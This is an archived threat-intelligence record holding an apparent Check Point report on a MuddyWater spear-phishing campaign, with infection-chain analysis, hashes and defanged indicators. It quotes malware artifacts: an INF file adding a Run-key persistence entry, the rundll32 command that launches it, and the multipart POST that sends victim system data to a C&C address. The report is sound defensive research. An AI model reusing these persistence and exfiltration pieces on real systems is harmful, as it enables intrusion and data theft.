{
	"id": "b9a81e98-a347-4b8c-9ee3-46927ff0d705",
	"created_at": "2026-04-10T03:22:10.66884Z",
	"updated_at": "2026-04-10T13:12:32.21005Z",
	"deleted_at": null,
	"sha1_hash": "534e66a543375db923604eb4a4e7ee07d168985b",
	"title": "The Muddy Waters of APT Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 80765,
	"plain_text": "The Muddy Waters of APT Attacks\r\nBy deugenio\r\nPublished: 2019-04-10 · Archived: 2026-04-10 02:27:28 UTC\r\nThe Iranian APT, MuddyWater, has been active since at least 2017. Most recently though, a new campaign, targeting\r\nBelarus, Turkey and Ukraine, has emerged that caught the attention of Check Point researchers.\r\nEver since at least 2017, the attackers behind MuddyWater have used a simple yet effective infection vector: Spear-phishing.\r\nAttacks usually begin with a targeted email sent to an organization. The next step is to steal legitimate documents from the\r\ncompromised systems within that organization and then weaponize and distribute them to other unsuspecting victims.\r\nTo do this, a lure message that prompts the user to enable their content is added to those files, which are often carrying logos\r\nof real companies or governmental entities. The well-crafted and socially engineered malicious documents then become the\r\nfirst stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS, a signature PowerShell\r\nbackdoor of this threat group. This powerful backdoor can receive commands from the attackers, enabling it to exfiltrate\r\nfiles from the system it is running on, execute additional scripts, delete files, and more.\r\nWhile these methods have remained consistent over the years, intermediate stages of this attack have been added, changed\r\nand removed due to several security vendors now aware of MuddyWater’s tactics, techniques and procedures. In this latest\r\nattack, though, and for the first time, we see a second stage executable that is not written in PowerShell.\r\nThe New Sample\r\nWe initially came across a malicious Word document titled “SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc”, which\r\nroughly translates into “SPK (Capital Markets Board of Turkey) Law Change.doc”. The document contains macros and tries\r\nto convince the victim to enable its content by displaying a decoy message in Turkish:\r\nFig 1: Malicious document with macros\r\nSHA-256: 2f77ec3dd5a5c8146213fdf6ac2df4a25a542cbd809689a5642954f2097e037a\r\nThe blurred image in the background contains a seemingly legitimate description of the law changes that are mentioned in\r\nthe title. The highlighted words in this image might suggest that it was edited in an environment that does not support the\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 1 of 10\n\nTurkish language:\r\nFig 2: Decoy document created in non-Turkish environment\r\nThe Infection Flow\r\nIf the macros in “SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled, an embedded payload is decoded and\r\nsaved in the %APPDATA% directory with the name “CiscoAny.exe”.\r\nThe executable is written in Delphi and packed with UPX, contains anti-analysis techniques, and seems to be impersonating\r\na cellular networking tool:\r\nCopyright             Copyright 2015-2019 A\u0026C Inc.\r\nProduct               RT 4G Cellular Networking Tool\r\nDescription           RT 4G Cellular Networking\r\nOriginal Name         RT_Framework.exe\r\nInternal Name         RT_4G\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 2 of 10\n\nFile Version          1.5.1.1\r\nComments              This application is absloutly free.\r\nRather than running this executable immediately, another file called “CiscoTAP.inf” is created under the same directory\r\nwith the following content:\r\n[Version]\r\nSignature=$CHICAGO$\r\n[DefaultInstall]\r\nAddReg=AddRegSection\r\n[AddRegSection]\r\nHKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Run,CiscoAny,,”%APPDATA%\\CiscoAny.exe”\r\nThen, the following command is executed to run the payload:\r\n“C:\\Windows\\System32\\cmd.exe” /k rundll32.exe ieadvpack.dll,LaunchINFSection %APPDATA%\\CiscoTAP.inf,,1,\r\nThis means that the executable will run the next time the user logs in, since it is added to the RUN registry key. IEAdvpack\r\nis a Windows 8 DLL, and this command will fail to run on certain operating system versions where this DLL is not found.\r\nINF files have been used in the past by MuddyWater, although they were launched using Advpack.dll and not\r\nIEAdvpack.dll.\r\nOnce executed, the first stage creates %APPDATA%\\ID.dat, a file which contains the victim’s unique identifier that is 16\r\ncharacters long and randomly generated:\r\n[UID]\r\nID=[VICTIM_ID]\r\nLater it collects information about the system it is running on, such as the host’s name, the running processes, physical\r\nmemory, up-time, language, public IP (using icanhazip.com) and more.\r\nAll of the above is written to %APPDATA%\\Info.txt, and the full information structure can be found in Appendix A below.\r\nFollowing the data collection, the executable drops another executable, also named “CiscoAny.exe”, that is hardcoded as a\r\nresource, but this time inside the %TEMP% folder.\r\nThe second executable is also UPX packed and written in Delphi:\r\nProduct               Uploader\r\nDescription           Uploader\r\nOriginal Name         CiscoAny.exe\r\nProgramId             com.embarcadero.Uploader\r\nFile Version          1.0.0.0\r\nFinally, the aforementioned ID.dat file is updated to indicate that the first stage of the infection has been successful:\r\n[UID]\r\nID=[VICTIM_ID]\r\n[STAGE]\r\nONE=SUC\r\nThe Second Stage\r\nThe second executable starts by checking the internet connectivity. It sends a request to google.com, and if the connection is\r\nsuccessful, it copies the contents of the previously created “Info.txt” into %APPDATA%\\[UNIQUE_ID].txt\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 3 of 10\n\nFig 3: Second stage instructions\r\nThen, it will POST the file containing the system details to 185.117.75[.]116.php:\r\n—————————–[VICTIM_ID]\r\nContent-Disposition: form-data; name=”g3t_f_465″; filename=”[UNIQUE_ID].txt”\r\nContent-Type: application/octet-stream\r\n[INFO.TXT CONTENT]\r\n—————————–[VICTIM_ID]\r\nContent-Disposition: form-data; name=”t0ken”\r\na8s9ydehj323r8ykjqwer@8124e\r\n—————————–[VICTIM_ID]–\r\nThe name parameters (“g3t_f_465” and “t0ken”) in this request are determined by the items of the TclHttpRequest object\r\nin the TFRMMAIN resource, embedded in the executable:\r\nFig 3: Embedded configuration\r\nReturning to the main executable, a request is sent to googleads.hopto[.]org with the victim’s unique ID:\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 4 of 10\n\nFig 6: C\u0026C communication\r\nThe response from the C\u0026C is stored in %APPDATA%\\temp.dat, and copied into %APPDATA%\\Lib.ps1.\r\nThe main executable constantly checks for “Lib.ps1” and tries to execute its content.\r\nAt the time of the analysis we were unable to get a response from the C\u0026C but, as previously mentioned, POWERSTATS is\r\na common tool for the next stage of the infection.\r\nAnti-Analysis\r\nThe anti-analysis technique utilized in the first executable is quite effective and makes it very hard to analyze this sample\r\nstatically.\r\nThe obfuscation creates a spaghetti-like code, and breaks apart the original code flow to small chunks, with the location of\r\nthe next “real” instruction calculated dynamically.\r\nFollowing are examples of such code, where the next instruction location is calculated, and then jumped to (either by “jmp”\r\nor “retn”):\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 5 of 10\n\nFig 7: Anti-analysis code fragmentation\r\nSimilarities to MuddyWater\r\nThe document and the embedded macros contained unique strings that enabled us to hunt for other similar samples using\r\nthem. This resulted in us finding three recent documents that appear to belong to the same campaign, some of which have\r\nbeen attributed to MuddyWater by other researchers:\r\nName: 2-Merve_Cooperation_CV.doc\r\nFirst Seen: Jan 02, 2019\r\nITW: infosystema[.]kg/public/images/file_library/2-Merve_Cooperation_CV.doc\r\nSHA-256: c873532e009f2fc7d3b111636f3bbaa3074\r\n65e5a99a7f4386bebff2ef8a37a20\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 6 of 10\n\nName: 3-New Law Updated for Client-VMP.doc\r\nFirst Seen: Jan 08, 2019\r\nITW: As an attachment in two e-mails\r\nSHA-256: 925225002364615b964e4e3704876d9b101e4f07169dbb\r\n459175248aefb5a0ad\r\nName: letter-for-Kazakhstan.doc\r\nFirst Seen: Jan 16, 2019\r\nITW: orbe-fzc[.]com/letter-for-Kazakhstan.doc\r\nSHA256: c005e11a037210eb8efe12b8dee794be361\r\n51de30b0223f2c9c4b9680cb033c0\r\nIn addition, by using VBA2Graph, we were able to visualize the VBA call graph in the macros of each document. This\r\nallowed us to quickly notice that the files share many similarities, such as their function names, parameter names, decryption\r\nmethods and general code flow. For example, the function “UFYYRJSFHX” that writes the decoded payload to the file\r\nsystem appears in all of them.\r\nWe have color coded the functions below, highlighting analogous functions to better show the similarities between the\r\ndifferent graphs in this campaign, starting with the document from the infection flow we analyzed above:\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 7 of 10\n\nFig 8: Vba2graph correlation within the same campaign\r\nAll those documents are from 2019, but the last two contain unique function names (“F38HUYFLSF985HFUISHS” and\r\n“SSSDS98746GB”) that were also observed in MuddyWater documents dating back to November 2018, allowing us to see\r\na connection between different campaigns:\r\nFig 9: Vba2graph correlation to a different campaign\r\nMuddyWater Anomalies\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 8 of 10\n\nWhile we can see a clear connection between the previous samples, there are some differences between them and the\r\ncommon delivery documents which are usually attributed to this highly active threat group.\r\nFor example, if we consider their appearance, and although this is not always the case, MuddyWater documents usually\r\ninclude a generic decoy message in English telling the victim to enable their content. This is missing from two of the\r\nprevious samples, and written in Turkish in the third one.\r\nFurthermore, if we continue to compare the macros of different documents, we will notice that a sample we discovered this\r\nmonth and attributed to MuddyWater uses another function naming convention in its macros (four lowercase letters, instead\r\nof a mix of uppercase letters and numerals):\r\nFigure 10: Vba2graph of a parallel recent campaign\r\nSHA-256: 08e256cd2fa027552be253ec3bf427b537977f9123adf1f36e7cd2843a057554\r\nThis deviates completely from the previous documents we looked into, but was also found in other MuddyWater samples\r\nfrom the recent months:\r\nFig 11: Vba2graph of a parallel recent campaign\r\nSHA-256: 93b749082651d7fc0b3caa9df81bad7617b3bd4475de58acfe953dfafc7b3987\r\nIt therefore seems that the same attackers are running parallel campaigns, which use at least two different macro generators\r\nfor the first stage of the attack.\r\nConclusion\r\nAlthough it has focused most of its efforts on the Middle East region, the political affiliations, motives and purposes behind\r\nMuddyWater’s attacks are not very well-defined, thus earning it its name. In the past, countries such as Saudi Arabia, the\r\nUAE and Turkey have been a main target, but the campaigns have also reached a much wider audience, making their way to\r\nvictims in countries such as Belarus and Ukraine.\r\nThe attackers are also constantly innovating and experimenting with new techniques, and the extra layers which they add\r\nbefore delivering their signature payload make it harder to attribute an attack to them with high confidence. Just recently, we\r\nspotted two DOCX files that take advantage of the external template technique to download the macro-equipped and\r\nfamiliar delivery documents of MuddyWater from remote hosts.\r\nTo conclude then, the attack we describe above shows an infection flow that we do not usually expect to see from\r\nMuddyWater, but it will not be surprising to see them introduce more changes in the near future.\r\n——————————————————————————————————————————————————————————————\r\nCheck Point’s Threat Emulation\r\nThe malware used in this attack was caught using Check Point’s Threat Emulation.\r\nThreat Emulation is an innovative zero-day threat sandboxing capability, used by SandBlast Network to deliver the best\r\npossible catch rate for threats, and is virtually immune to attackers’ evasion techniques. As part of the Check Point\r\nSandBlast Zero-Day Protection solution, Threat Emulation prevents infections from new malware and targeted attacks.\r\nAppendix A\r\nIP Address : [IP_ADDRESS]\r\nHDD Information :\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 9 of 10\n\nH.D.D Name : [HOST_NAME]\r\nProcess List :\r\n0 = [PROCESS_NAME_0]\r\n1 = [PROCESS_NAME_1]\r\n2 = [PROCESS_NAME_2]\r\n3 = [PROCESS_NAME_3]\r\n4 = [PROCESS_NAME_4]\r\n5 = [PROCESS_NAME_5]\r\n6 = [PROCESS_NAME_6]\r\n7 = [PROCESS_NAME_7]\r\n8 = [PROCESS_NAME_8]\r\n9 = [PROCESS_NAME_9]\r\n10 = [PROCESS_NAME_10]\r\nMemory information :\r\n[%] memory in use\r\n[KB] of physical memory\r\n[KB] of available physical memory\r\n[KB] that can be stored in the paging file\r\n[KB] available in the paging file\r\nLanguage Is :English (United States)\r\nUptime: 1 Days 1 Hours 1 Minutes 1 Second\r\nSource: https://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/the-muddy-waters-of-apt-attacks/"
	],
	"report_names": [
		"the-muddy-waters-of-apt-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775791330,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.pdf",
		"text": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.txt",
		"img": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.jpg"
	}
}